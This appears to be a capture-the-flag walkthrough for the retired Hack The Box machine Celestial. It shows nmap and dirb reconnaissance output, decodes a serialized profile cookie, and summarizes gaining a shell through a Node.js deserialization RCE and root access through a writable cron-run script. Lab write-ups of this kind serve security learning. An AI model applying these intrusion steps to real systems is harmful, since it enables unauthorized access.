Hello folks . here I will describe step by step how to get root on Celestial which has been retired .
the IP address of the box is 10.10.10.85
Enumeration
root@h4d3s:~# nmap -sT -T5 -A 10.10.10.85
Starting Nmap 7.70 ( https://nmap.org ) at 2018–05–12 16:48 CEST
Nmap scan report for 10.10.10.85
Host is up (0.027s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.2–4.9 (95%), Linux 3.8–3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hopsTRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 74.76 ms 10.10.16.1
2 15.42 ms 10.10.10.85OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.91 seconds
Nmap have found a node.js application on port 3000 .
when we visit the node.js application on port 3000 we find that
dirb don’t find anything ( we are not facing a usual web application)
root@h4d3s:~# dirb http://10.10.10.85:3000-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Sat May 12 17:00:02 2018
URL_BASE: http://10.10.10.85:3000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://10.10.10.85:3000/ ----
^C> Testing: http://10.10.10.85:3000/Privacy
analyzing the index page deeper we find a suspicious cookie value for profile
the profile value URL decoded is a base64 encoded string “eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ==” which once decoded give us this string ‘{“username”:”Dummy”,”country”:”Idk Probably Somewhere Dumb”,”city”:”Lametown”,”num”:”2"}’ .
We can conclude than the node.js application use this value for the index page . And this string appears like a serialized object and the node.js maybe deserialize these data .
After a bit of google searching we find a good write-up about that vulnerability in node.js deserialization and how this vulnerability can lead to a RCE https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf
Once reproducing step by step the research document we can get a shell as ‘sun’ and fetch the user.txt.
Privilege Escalation
The privilege escalation in that box is pretty straightforward as in the sun directory we can find an script.py which is executed by cron every x minutes and by editing we can have our python code executed as root.
